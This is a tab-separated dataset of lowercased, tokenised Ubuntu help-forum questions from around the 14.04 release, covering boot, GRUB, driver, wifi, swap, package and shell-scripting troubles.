456060	drm : no driver support for vblank timestamp query	my graphics seems to be lagging a bit . i entered the command : dmesg | egrep 'drm|radeon' and i received this message [ 2.205753 ] [ drm ] initialized drm 1.1.0 20060810 [ 2.246056 ] [ drm ] vgacon disable radeon kernel modesetting . [ 2.246062 ] [ drm ] radeon userspace modesetting enabled . [ 2.246861 ] [ drm ] supports vblank timestamp caching rev 2 ( 21.10.2013 ) . [ 2.246866 ] [ drm ] no driver support for vblank timestamp query . [ 2.246871 ] [ drm ] initialized radeon 1.34.0 20080528 for 0000:02:00.0 on minor 0 [ 2.247838 ] [ drm ] supports vblank timestamp caching rev 2 ( 21.10.2013 ) . [ 2.247840 ] [ drm ] no driver support for vblank timestamp query . [ 2.247842 ] [ drm ] initialized radeon 1.34.0 20080528 for 0000:01:05.0 on mino my question is , what do the lines : [ 2.246866 ] [ drm ] no driver support for vblank timestamp query . [ 2.247840 ] [ drm ] no driver support for vblank timestamp query . mean ? i am a newbie , just wanted to know if this is something to worry about , i ca n't find anything in google .
456061	how do i get a brother dcp-7065dn printer working ?	i had the scanner working in ubuntu 12.04 , but now when i try to launch xsane , i get a scanner not found error : brsaneconfig4 -q | grep 7065 produces the following output : 144 `` dcp-7065dn '' 0 dcp-7065dn `` dcp-7065dn '' i:192.168.1.11 edit : the problem was with setting a manual ip on the scanner . if i assign the ip address via dhcp , the scanner works !
456062	use windows laptop as second screen to ubuntu laptop	i 'm using ubuntu & i want to use my old windows 7 laptop as second monitor . i 've come across a couple of questions around similar issue but none that are specific to my configuration . i 'd really appreciate if someone can suggest a solution for this .
456066	upgrade to 14.04 does not boot	a screen popped up suggesting that i upgrade to 14.04 ubuntu . i clicked ok , and the computer will not boot now . the only thing that i see is the message `` grub rescue > '' a web search found a lot of complaints and a lot of complaints about solutions which did not work . i tried several things , with varying degrees of success . use install disk from previous version , press f12 after start-up . this gives me a boot screen , and if i select ubuntu , it goes to another screen which allows either a linux or windows boot . this is workable , but it uses the dvd disk and takes a while . 2 ) there was a bug report and the reply said that this was a user error and it is necessary to dpkg reconfigure grub-pc . this does not work . it has absolutely no effect . 3 ) another post suggested using boot-repair . this appears to downgrade grub back to 2.0 . it then configures boot on /dev/sda8 . this also does not work . the error message suggested e-mailing boot.repair @ gmail.com , but there was no response . maybe this tool is out of date ? 4 ) another post suggested reinstalling grub-pc , which i guess is the beta version that ships with 14.04 and reconfigure . this just brings back the beta version of grub , and this does not work either . the grub rescue > prompt shows up , and no progress can be made past this point . 5 ) another post recommended using supergrubdisk , but a whole bunch of replies said that this will not work . apparently , sometimes it works , but why ? ? ? ? somehow , there is a problem with how the new grub works . i suspect that the reason why the old install dvd works is that it contains an older , more stable , version of grub and that is doing the successful , although circuitous boot . the problem is that there are a lot of suggestions with no real understanding of the problem . could anybody explain what is going on and how to solidly solve the problem ? thanks , eric
456072	clementine wo n't play .wma , with `` your gstreamer installation is missing a plugin '' error	here 's a screenshot : it displays messages like : `` clementine stopped . '' or displays songs that are not playing , and indicator icon is disappearing and reappearing . does this happens only to me , or is it common bug in 14.04 . i clean installed 14.04 , and in 13.10 clementine worked fine . any ideas ? i installed ubuntu restricted extracts . edit1 : i restarted computer and theme changed : edit2 : i just figured out that clementine wo n't play .wma files , and that 's when errors start to emerge . edit3 : vlc and the default ubuntu player play .wma without problems . please help !
456076	/etc/x11/xorg.conf keeps getting renamed ?	i am using /etc/x11/xorg.conf to configure xf86-input-mtrack . /etc/x11/xorg.conf keeps getting renamed after every 4 or so reboots . for example , it was renamed to /etc/x11/xorg.conf.0426201 recently . why does this happen ?
456078	finding and deleting all files that begin with . within a directory	i 'm trying to find and delete all files that begin with . within a directory , and i know that i could do this via the command terminal but i 'm very new to ubuntu and do n't quite know my way around commands yet . any help would be appreciated !
456080	error when trying to create desktop icons	new user to ubuntu 14.04 , and having trouble trying to create desktop icons . when i drag and drop it tells me : error while copying . there was an error getting information about â/â . unable to get past this , not sure of the commands to do it through terminal screen . any ideas ?
456082	ubuntu touch expansion timeline	i for one am excited for ubuntu touch and its release . but unfortunately , i am an impatient man . does anyone know the future plans for this platform ? i really want to get my hands on it but luck has not been on my side at all with this one . the only supported devices as of posting this is the nexus series , which i do n't have . i did some research with the intent to buy it , but i found out that my carrier verizon does not support the nexus series at all , which disappointed me a lot . i currently use a galaxy s3 . can anyone tell me if the galaxy phone will gain support , and if so when . or when phones that are supported by verizon can either be prepackaged with ubuntu touch or gain support ? thanks in advance for any leads to my answer .
456085	mysecureshell sftp `` authentication failed ''	i am trying to connect to my sftp server ( configured with mysecureshell ) , but keep getting the response `` authentication failed '' . the username and password is correct . i created an sftp group : groupadd sftp then made a user for that group with the shell : useradd webfiles -m -s /usr/bin/mysecureshell -g sftp and gave him a password then appended the /etc/ssh/sftp_config file with : < group sftp > download 0 upload 0 stayathome true virtualchroot true limitconnectionbyuser 10 limitconnectionbyip 10 idletimeout 300 hidenoaccess true < /group > but it wont let me connect my final aim is to have the user webfiles to have access to the /var/www directory , but first i just need to get him to be able to connect lol any help appreciated : d
456088	weird output by declare and array	i am trying to output the values of array element but i am getting weird output . please have a look at it and help me solve it . thank you . n=2 declare -a myarray [ $ n ] myarray [ 0 ] =hey myarray [ 1 ] =hello myarray [ 2 ] =bye for i in $ { myarray [ @ ] } do echo $ i done output : robin @ robin-virtualbox : ~/lx $ sh array.sh array.sh : 2 : array.sh : declare : not found array.sh : 3 : array.sh : myarray [ 0 ] =hey : not found array.sh : 4 : array.sh : myarray [ 1 ] =hello : not found array.sh : 5 : array.sh : myarray [ 2 ] =bye : not found array.sh : 6 : array.sh : bad substitution
456089	lost my wifi connection when going from u13 to u14	using dual operating systems , win 7 and ubuntu 13.10 . installed ubuntu 14.4 and lost my ability to connect to wifi . win 7 works fine , no problem on automatic connection . ubuntu 14.4 installed nicely except does not automatically connect . yes , i have read the help section on wifi connection . why can i connect with win 7 and ubuntu 13 , but no longer with ubuntu 14 .
456091	parcellite menu appears at startup	the menu appears when parcellite is started . this happens at boot-up and if i start it using the dash button . see animated gif below . i 've removed and re-installed parcellite . i 've also deleted ~/.config/parcellite directory . no luck . how can i prevent the parcellite menu from appearing at start-up ? ubuntu 14.04 parcellite 1.1.7
456092	hp pavilion built for windows vista hung up	i was trying to put ubuntu 14.04 onto an hp pavilion a6320n desktop made to run windows vista . curiously enough , when i tried to boot to the usb , i could get to the point to where it was installing , but it would flick to a glitched- out screen . i tried again , and i finally got it properly installed . when i rebooted , it would n't load the launcher or the menu bar . i tried reinstalling ubuntu many more times , each with the same two errors- either a bugged- out screen or hung up loading . i tried this on my newer dell 1545 and it worked so i was sure there were no problems with the disk itself .
456105	timidity and tux guitar troubles	i was trying to improve crappy sound quality in my tuxguitar . i 've found this http : //tylerfrankenstein.com/code/tuxguitar-better-sound-ubuntu-12 and i did everything it was said here except for the point where he says you should `` select `` timidity port 0 [ 128:0 ] '' for the `` midi port '' `` because my only option except gervill is `` midi through port-0 [ 14:0 ] '' , so i 've picked this one . later everything went according to the plan , except of course , it did n't work . i hear no sound and i have no idea how to fix it .
456107	ubuntu 13.10 to 14.04 upgrade failure	i recently tried to upgrade from ubuntu 13.10 to 14.04 . when i ran the upgrade , it ran into a problem upgrading one of the modules , and would n't let me continue . however , when it stopped , it does n't appear to have reverted all of the changes . now my computer believes it is 14.04 , but it actually isn't/is n't fully upgraded , and i ca n't figure out how to try to run the upgrade again . any ideas ?
456109	error reading disk drive /tmp at boot	first i want to say thank you in advance because i have been reading all the forum entries about similar problems and i have had no luck in solving this one . i have a dell inspiron with a phony windows 7 os ; it 's currently open to viruses and i 'm trying to use a different , more secure os , such as linux . i 'm in a cis 101 class but still a noob ( beginner ) when it comes to computer language , so i would need step by step instructions on how to solve this problem . here 's my problem : i installed ubuntu on my comp using both a dvd and usb flash stick . i can select ubuntu as the os but it gives me the message : error reading disk drive /tmp is not responding . i need to know what is the problem is exactly and what i need to do to bypass this or manually recover the /tmp . once again thank you all for your input .
456110	ubuntu does n't boot and boot-repair-disk does n't solve the problem	the problem started with a little graphic problem and evolved to a ubuntu 12.04 that does n't boot . instead , it led me to a command-like screen with the word initramfs . after that i tried to fix it by a usb-live boot-repair-disk , but i didnt get any luck from that , and now i dont even get the screen with initramfs anymore . now i get the `` error : file not found grub rescue . what can i do to repair the os , or should i just reinstall the whole system ? thanks a lot i got this report from the boot-reapir-disk . http : //paste.ubuntu.com/7341382/
456111	upgrade from ubuntu with kde desktop to kubuntu	two years ago , when the last lts came , i decided to install kde ( desktop or full , not sure which ) on top of my personal installation after the ubuntu upgrade to 12.04 from 10.04 . so , now that 14.04 iteration is out , i 'm looking to upgrade my system again . the issue is that since i technically have a ubuntu installation and not a kubuntu installation , i 'm not sure which upgrade path is the safest to take . i understand that there will be changes , but basically i do n't want to lose all of my mods over the past two years . ( e.g . : custom downloaded : boot screen , desktop effects , mouse pointers ) the solution also must include settings for programs installed after-the-fact . ( e.g . : yakuake ) the way i see it , there is one of two possible ways to do this . similar to what is discussed here : fresh install kubuntu and move settings over . update ubuntu and kde . i 'd suspect # 2 would be the safer route . but then again , # 1 would provide a leaner installation if there were a way to migrate all the settings properly . i really must bow to the experts on this one . two things to note : i have already have dd backups of my partition so i can experiment . ... within reason ... i 'd rather like to be set within a week . i have absolutely zero attachment to anything from gnome .
456114	remove .deb package from ubuntu	i installed a debian package libncurses5-dev : i386.deb using `` sudo dpkg -i libncurses5-dev : i386.deb '' . however i realized that i needed another package libncurses5-dev_5.7+20100313-5_amd64.deb . when i tried to install this one i got an error `` libncurses5-dev : 5.7+20100313-5 ( multi-arch : no ) is not co-installable with libncurses5-dev : i386 5.9-4 ( multi-arch : no ) which is currently installed errors were encountered while processing : '' . i tried to remove libncurses5-dev : i386.deb . i went to /var/lib/dpkg/info and then sudo rm libncurses* to remove all the packages . i tried to install my amd64 package again but i get the same error message saying it cant install with libncurses5-dev : i386 5.9-4 also when i do dpkg -- list | grep -i libncur* , i dont see any results , so i am a bit confused can someone please help me ? thanks
456115	i disabled my touchpad , and now there 's no option to reenable it on ubuntu 14.04	i installed ubuntu 14.04 on my laptop ( lenovo z400 ) . last night i disabled the touchpad , because i was using external mouse . today i tried reenabling the touchpad , but there is n't that option any more in the mouse settings . i am just seeing the setting for primary button and double click speeds . where did my touchpad go ?
456117	add new layout keyboard not available	i have install remote desktop with xfce and xrdp . i'am trying change my layout disposition but not option for add new layout is not available . the `` add '' button appear as disable . how can i fix it ? ubuntu 12.04 32-bit , with xfce and xrdp access . thank you
456124	how to launch .jar files ?	i am trying to launch minecraft.jar and i can not make it boot as an executable . i have gone into the properties and set it to executable , and i have installed jdk-7u55-nb-8-linux-x64.sh with and without superuser . i do run a x64 computer . i recieved the file from the website here . i have tried ./minecraft.jar and java -jar minecraft.jar output of java -jar minecraft.jar the program 'java ' can be found in the following packages : * default-jre * gcj-4.6-jre-headless * gcj-4.7-jre-headless * openjdk-7-jre-headless * openjdk-6-jre-headless try : sudo apt-get install < selected package > output of ./minecraft.jar ./minecraft.jar : line 1 : $ 'pk\003\004 ' : command not found ./minecraft.jar : line 2 : $ '\b\b\222t\354b\002 ' : command not found ./minecraft.jar : line 3 : syntax error near unexpected token ` ) ' k-*��ϳr0�3���m���u�i , .�r�k-����km.jl+�k��/ ) . ) j , �s��x�x�pk'k- .
456133	unable to type in korean ?	i have just installed ubuntu 14.04 and tried to type in korean by adding the korean language by using the language support and input method switcher . however , i am still unable to type in korean . i have also installed ibus hangul , but i am unable to see any ibus settings or anything related to ibus in any settings . i have tried switching the language from the top right setting from en to ko and i still type in english . so how can i type in korean , did i miss a step or something ? any advice would be greatly appreciated .
456138	problem in compiling xv6 mit 's project	currently , i am working on xv6 but there is a problem when i build it withmake qemu then it gives me following error : i386-elf-gcc -fno-pic -static -fno-builtin -fno-strict-aliasing -wall -md -ggdb -m32 -werror -fno-omit-frame-pointer -c -o cat.o cat.c make : i386-elf-gcc : command not found make : *** [ cat.o ] error 127
456140	drag and drop desktop icons	is there a utility that allows a drag and drop of app icon to the desktop to create a quick launch icon ? i know the terminal command to create one . but it is somewhat difficult if you do not know the command path .
456142	the screen amplifier not allow me to login on ubuntu 14.04 lts	i 'm new on ubuntu 14.04 lts . looking on its resources i choose the screen amplifier ( kmag ? ? ) on login screen , and now i 'm not able to login and neither turn off this resource . could someone help me ? i tried to install and remove kdeaccessibility and did n't work . also tried to killout this process , but it did n't work . at last , i tried to start the graphic safe mode throught the recovery mode , but also did n't wirk showing an error . thanks a lot .
456143	battery problems with ubuntu touch	so i installed ubuntu touch 14.04 on my nexus 7 2013 and it will only charge when turned off and it takes forever to charge , like after four hours i am only at 40 % or that is what the battery icon says . do you think the icon is not reading correctly or do you think there is something wrong and it is not charging correctly ?
456147	driver daily usb joystick	i want to play a pcsx2 in my ubuntu , but i want to play using a daily usb joystick . but it do n't work nothing . there are any driver for my joystick ?
456150	im running ubuntu 12.4 on an acer c710 chrombook what games can it handle	i have an acer c710-2856 and i am dual booting ubuntu 12.4 what games could my chromebook handle . it has a 2 gb sdram ddr3 ram and an intel processor and has 1.1 ghz of processing power ... and also are their any good places to find these games for free thanks
456151	acer aspire 9300 laptop - no wifi with ubuntu	i tried installing ubuntu 14.04 64 and 32 bit versions on my laptop with no luck . i then got an older version of ubuntu 11.04 and got things up and running . all seemed to work except my wifi . i upgraded to ubuntu 12.04.4 and same thing . after install i got white text message during the boot up in the top left hand corner of the screen saying ; ( 23.3856131 b43-phy0 error : firmware file `` m3/ucode.fw not found ( 23.3856221 b43-phy0 error : firmware file `` m3-open/ucode5.fw not found ( 23.3856271 b43-phy0 error : you must go to and download the correct firmware for this driver version . please carefully read all instructions on this website . i went to that website and there was nothing listed for my acer aspire 9300 . there were several acer 's listed but not the 9300 . how can i get my wireless working ? please keep in mind i am brand new to linux and ubuntu along with everything in it . i have some dos experience from 20 plus years ago but have been windows based ever since . ideally i 'd like to get this laptop running ubuntu 14.04 in future . i 'm thinking if i can get the wifi working in an older version and then do an upgrade to a newer version that the drivers and or files will be carried over to the new version with the upgrade . yes no ? so , where do i start ? thank you in advance .
456152	galaxy tab 3 - t217s	i would really like to get ubuntu on this device of mine . can anyone offer a solution for me to build ubuntu myself for this device ?
456154	use apt directly vs apt-* ?	i just found that there is a apt command that you can use directly : $ sudo apt apt 1.0.1ubuntu2 for amd64 compiled on apr 10 2014 13:03:39 usage : apt [ options ] command cli for apt . basic commands : list - list packages based on package names search - search in package descriptions show - show package details update - update list of available packages install - install packages remove - remove packages upgrade - upgrade the system by installing/upgrading packages full-upgrade - upgrade the system by removing/installing/upgrading packages edit-sources - edit the source information file with similar syntax to apt-get . and it offers some coloring in the cli interface . so i want to know if there are some major difference between apt and apt-* commands ? why do people seem to post commands as apt-get install and apt-cache search when they don ' t need the additional options apt-* commands provide , while apt is shorter with all the similar functionality with additional coloring , and in my opinion , better output format ? is it only habit ? i see in the manual pages that apt is for end-users while other low-level commands are for scripts . so why is everyone posting those low-level commands instead of the more user-friendly high level command ?
456156	upgraded my 32 bit machine with 64 bit live image of ubuntu 14.04 by accident !	i just upgraded my 64 bit laptop successfully to ubuntu 14.04 using a 64 bit live image and then upgraded my desktop with the same 64 bit image forgetting that my desktop is a 32 bit machine . now my desktop is stuck at boot screen after `` adding swap ... . '' should i download the 32 bit image now to fix my desktop or can it be fixed with the 64 bit image that i already have ? thanks in advance !
456159	how to add more wallpapers in ubuntu 14.04	default wallpapers in ubuntu 14.04 are very limited how can more wallpapers be added to this list ?
456161	networking and the card reader stopped working when i upgraded to ubuntu 14.04	i just upgraded my lgz35 to ubuntu 14.04 . all the networking and the card reader stopped working . is there any way to fix it since , i want internet back on my laptop .
456164	keyboard troubles	i recently got a great new keyboard , the perixx px-1100 , but i 'm having trouble with it . if you look up and study said keyboard , you will see that it has backlighting . there is a knob to adjust the brightness , and a button that changes the light color or turns it off . when you plug it in or the computer starts with the keyboard already plugged in , the light is blue . the color order is `` blue > red > purple > off '' . i 've found out that pressing this button operates different things . depending on which color the keyboard is already on , pressing this button does the equivalent of `` button 1 '' , `` button 2 '' , `` button 3 '' , or `` button 4 '' . if the backlight is blue and you press the button ( changing to red ) , it performs `` button 3 '' . if it 's on red and you press the button ( changing to purple ) , it performs `` button 2 '' . if the the backlight is purple and you press the button ( turning off the light ) , it performs `` button 4 '' . if the backlight is off and you press the button ( changing to blue ) , it performs `` button 1 '' . it also seems the hold down the button as long as it 's on the color . this causes issues where if i 'm in a browser , i ca n't click on certain things . i understand that usually , `` button 1 '' is left click , `` button 2 '' is right click , and `` button 3 '' is clicking your scroll wheel . i want to disable the light change button 's ability to be the equivalent of button 1 , 2 , 3 , or 4 . i plugged it into a windows laptop and had no such problem . using the command xev tells me that : changing the color to blue is `` button 8 '' . changing the color to red is `` button 2 '' . changing the color to purple is `` button 3 . turning off the backlight is `` button 8 '' .
456166	how to use sed to substitute current date ?	how do i use sed to substitute date by a word . i tried doing this : tmp=`date + % d` echo $ tmp if [ $ tmp -lt 10 ] then pat= '' d '' echo $ pat else pat= '' dd '' echo $ pat fi cal | sed `` s/ $ tmp/ $ pat/ '' and the output is like so : robin @ robin-virtualbox : ~/lx $ bash p13.sh 27 dd april 2014 su mo tu we th fr sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 edit : i want the date 27 to change into dd , like in here : april 2014 su mo tu we th fr sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 dd 28 29 30
456169	`` some updates can not be installed ''	the thing is i tried to upgrade my distro from 12.04 to 12.10 and after that my pc went crazy . what is the best way to proceed ? if i try to do a partial upgrade , it says it 's not possible . i installed my system yesterday , i absolutely love ubuntu , but i want it back and running again . it is installed alongside xp . what can i do to solve this ? maybe a clean reinstall ? how to do this ? thank you in advance !
456171	can you redirect sound from an esx server where ubuntu is installed ?	i am quite fascinated with the latest build of ubuntu ( 14.04 ) and started to do some testing . i have a copy of ubuntu installed on an esx server ( after testing it locally on my machine via vmwware wkst ) what i am trying to accomplish : redirect sound to my local machine from the instance of ubuntu installed on the esx server to my local machine . i can redirect sound via rdp for microsoft clients on this server and hoping for something equal for possible future ubuntu vdi clients . i have vnc installed and after configuring dconf and disabling encryption i can make connections but ca n't get sound . it 's my hope that i can run ubuntu on stronger hardware and connect to it remotely . thanks for any assistance . ( a bit of a newbie here ... but i did do a few searches and did not see anything matching my specific scenario ... so thanks for the help on this . ) this appears to be a quite polished offering ... thanks canonical !
456173	are there people know how to copy the all of data in root to normal user below /home	i use the root for a period of times , now , i log on the normal user i created before , which environment is not as same as root . are there people know how to copy the all of data in root to normal user below /home ( entire cover ) ?
456174	shotwell manager - excluding imported photos from unity dash	i am using ubuntu 12.10 . using `` privacy '' , i have excluded some folders from record activity and also excluded shotwell manager 's activities to be recorded . however , when i import some photos from above excluded folders into shotwell manager ( `` in-place import '' and not `` copy to library folder '' ) , these photos start appearing in dash search results despite the above privacy settings . does shotwell manager store the info on in-place imported photos in some file which can still be accessed by dash ? update : i excluded ~/.local/share/shotwell/data folder from privacy as well but do n't see any change in dash 's access to in-place imported photos
456175	logitech c920 webcam on ubuntu 14.04 hesitates / chops every 3 seconds	my logitech hd pro c920 webcam on ubuntu 14.04 ( 64 bit ) runs out of the box ( thanks to uvc , if i understand correctly ) , video and audio are sharp and clean , but only for 3 seconds ... the video ( audio is fine ) hesitates or chops every 3 seconds or so for maybe half a second , then runs again 3 , 4 , 5 seconds smoothly and hesitates again for half a second ... the hardware is fine , the webcam records and plays without any problem on windows 7 . my pc is an intel core 2 quad cpu q9300 @ 2.50ghz , 64 bit , grahics intel g33 . here is what i tried so far : tried different recording software : cheese , gtk uvc video viewer , vlc ( media – open capture device – video camera ) connected the webcam to different usb ports tried lower resolutions and fps clean dual-boot re-install ( windows 7 , ubuntu 14.04 ) tried my webcam on another pc that also runs ubuntu 14.04 – same choppy result tried another older webcam ( logitech quickcam pro 9000 ) on my pc – runs smoothly i thought , maybe , it 's just this special model which does not run smoothly on ubuntu . the c920 ( as opposed to the c910 ) – linux cobination does n't seem to be officially supported , but i googled around and found others describing how great their logitech c920 runs on their ubuntu without the need to install any additional driver or software . as i am new to ubuntu , this might also be a very basic settings problem ... i 'm completely lost here . do you have any idea what else i might try ? thanks for your advice ! ... and btw hi to everybody ! here is s.th . else i just tried : ubuntu , xubuntu , lubuntu are based on the same core system , but i gave it a try anyway and installed xubuntu . the result is the same as expected : still choppy .
456178	brightness controls mismatch	this seems to be a hardware issue rather than a ubuntu issue , but nevertheless , here goes . i have an acer ao756-2617 with ubuntu 14.04 , elementary os luna , bodhi linux , and zorin os 8. most of these if not all are ubuntu or debian related ( not sure bout bodhi ) . anyway , every time i try to use my brightness controls for the screen , they do n't work . when i use them , all i get is the animation on the upper right corner that its working , but it does n't actually do anything . so i did some research . i found that i could manually change the brightness using one of two things : sudo intel_backlight < % no . of brightness > echo < no . from 0 - 976 > | sudo tee - /sys/class/backlight/intel_backlight/brightness apparently , the file controlling the brightness for the screen is the one described on the command above . i did an acpi_listen to see what i got when i used the fn+brightness controls and i got : video/brightnessdown brtdn 00000087 00000000 video/brightnessup brtup 00000086 00000000 ( those come from ubuntu 14.04. the other os 's give similar output ) this suggests that these keys are being mapped to be handled to acpi drivers , instead of the intel ones . i tried changing that , but i have no idea what to do . i dont even know if i 'm on the right track . granted , i know that a backlight problem must n't be much of a concern for the devs , but this could help others like me . help , anyone ?
456181	bumblebee on 12.04 : failed to initiate mode change	i used to run bumblebee successfully on my previous ubuntu 12.10 . but ever since i migrated to elementary os luna , which is based on ubuntu 12.04 , i have been trying with no luck to get bumblebee working . when i run optirun glxspheres64 , it says [ 11119.768519 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initiate mode change . [ 11119.768595 ] [ error ] aborting because fallback start is disabled . here 's the output of optirun -vvv glxspheres64 , [ 11701.336788 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 11701.337274 ] [ info ] configured driver : nvidia [ 11701.337514 ] [ debug ] optirun version 3.2.1 starting ... [ 11701.337555 ] [ debug ] active configuration : [ 11701.337590 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 11701.337629 ] [ debug ] x display : :8 [ 11701.337662 ] [ debug ] ld_library_path : /usr/lib/nvidia-331 : /usr/lib32/nvidia-331 [ 11701.337686 ] [ debug ] socket path : /var/run/bumblebee.socket [ 11701.337709 ] [ debug ] accel/display bridge : auto [ 11701.337734 ] [ debug ] vgl compression : proxy [ 11701.337757 ] [ debug ] vglrun extra options : [ 11701.337779 ] [ debug ] primus ld path : /usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus [ 11701.337847 ] [ debug ] using auto-detected bridge virtualgl [ 11727.088558 ] [ info ] response : no - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initiate mode change . [ 11727.088593 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initiate mode change . [ 11727.088605 ] [ debug ] socket closed . [ 11727.088639 ] [ error ] aborting because fallback start is disabled . [ 11727.088652 ] [ debug ] killing all remaining processes . and my /etc/bumblebee/bumblebee.conf is , # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver=nvidia # directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d # # client options . will take effect on the next optirun executed . [ optirun ] # acceleration/ rendering bridge , possible values are auto , virtualgl and # primus . bridge=auto # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # list of paths which are searched for the primus libgl.so.1 when using # the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-331-updates module=nvidia pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-331-updates : /usr/lib32/nvidia-331-updates # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-331-updates/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau any idea how to fix this ? please help
456183	what does unknown media type in type 'all/all ' mean ?	i reinstalled the amarok player in my kubuntu 14.04 because it seemed buggy . i noticed this in the terminal : david @ emachine : ~ $ sudo apt-get install -- reinstall amarok reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 0 not upgraded . need to get 5,715 kb of archives . after this operation , 0 b of additional disk space will be used . get:1 http : //mirror.lstn.net/ubuntu/ trusty/universe amarok i386 2:2.8.0-0ubuntu3 [ 5,715 kb ] fetched 5,715 kb in 2s ( 2,611 kb/s ) ( reading database ... 128504 files and directories currently installed . ) preparing to unpack ... /amarok_2 % 3a2.8.0-0ubuntu3_i386.deb ... unpacking amarok ( 2:2.8.0-0ubuntu3 ) over ( 2:2.8.0-0ubuntu3 ) ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for mime-support ( 3.54ubuntu1 ) ... processing triggers for shared-mime-info ( 1.2-0ubuntu3 ) ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' processing triggers for man-db ( 2.6.7.1-1 ) ... setting up amarok ( 2:2.8.0-0ubuntu3 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... look at all the unknowns . could these be the cause of the player not working correctly ? how can i fix this if it is , an error ?
456186	install windows on a usb flash drive from ubuntu	i want to install a windows version on a usb flash drive from ubuntu . how can i do it and which version of windows should i choose ?
456187	creating a single pdf from a lot of image	i have a lot of image files . i want to convert them to one single pdf file . how can i do it ?
456188	missing menu bar	i have recently upgraded to ubuntu 14.10 . i ca n't see the the side or top pane in my administrator account . moreover i ca n't access the terminal with the ctrl+alt+t shortcut . please advise on how to fix this .
456190	ca n't find .config folder in ubuntu 14.04 ?	i 'm reading instruction to move files into .config folder tree specifically ~/.config/geany/filedefs/ , but ca n't find it in ubuntu 14.04 .
456192	with ubuntu one shut down , is there a way to sync applications between computers ?	since ubuntu one is no longer it appears that sync between computers no longer works . is there a new method to do this ? i 'd like to sync the apps from one machine to another .
456194	swap not being detected on 14.04 lts	i upgraded from 12.04 to 14.04 . when i opened my resource monitor , i noticed my swap was not detected . i installed gparted , opened the program and started to look at my file tree . i noticed that my swap area was flagged as unknown , with a red exclamation point beside it . i formatted it as linux-swap , then selected 'swapon ' from the menu . i reloaded the system monitor and it looked as if my problem was solved . i restarted my computer , opened up system monitor again , and i saw that swap was no longer there . in gparted , this time the partition was recognized as swap , but the system did not see it . i need to `swapon every time my system reboots . i was first alerted to this issue when vmware told me that i had no swap . i thought i did , since all i did was upgrade my distro . my partition layout did not change at all during the upgrade process . i decided to use my gparted livedisk to format that same swap area ( that you will see in the photos ) as linux-swap . before i did that , gparted livesisk gave the same error that it was unrecognised . with the swap formatting completed , i restarted my computer , to find out that it did not boot . this time grub has an error . this has never happened to me before with distros , doing similar disk work . then i decided to do a clean install of 14.04 from usb and cd , but i am still having the same problem . i tried ( as you will see in photos as well ) to 'swapon -a ' from terminal with no success either ( even though i am able to swapon from gparted in the os ) - i get a directory error . this is my fstab file : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda5 during installation uuid=a596c6cc-c9aa-43fe-aaad-abfeaae63916 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation # uuid=c4959ceb-5934-4cff-acd3-33ffcb153220 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 i do n't know much of what that information means , but it might be helpful to you . could i have messed up my swap by formatting it in gparted ? it was unknown in the utility , since it was cryptswap . this is my current state . as i said , i need to 'swapon ' every time i restart . i have used ubuntu as dual-boot for several years now . since 6.06 `` dapper '' . i have used almost every distro and have never had this problem before . this is where i ask of your help and suggestion . i am no geek , only an enthusiast , and i posses basic skill and ability .
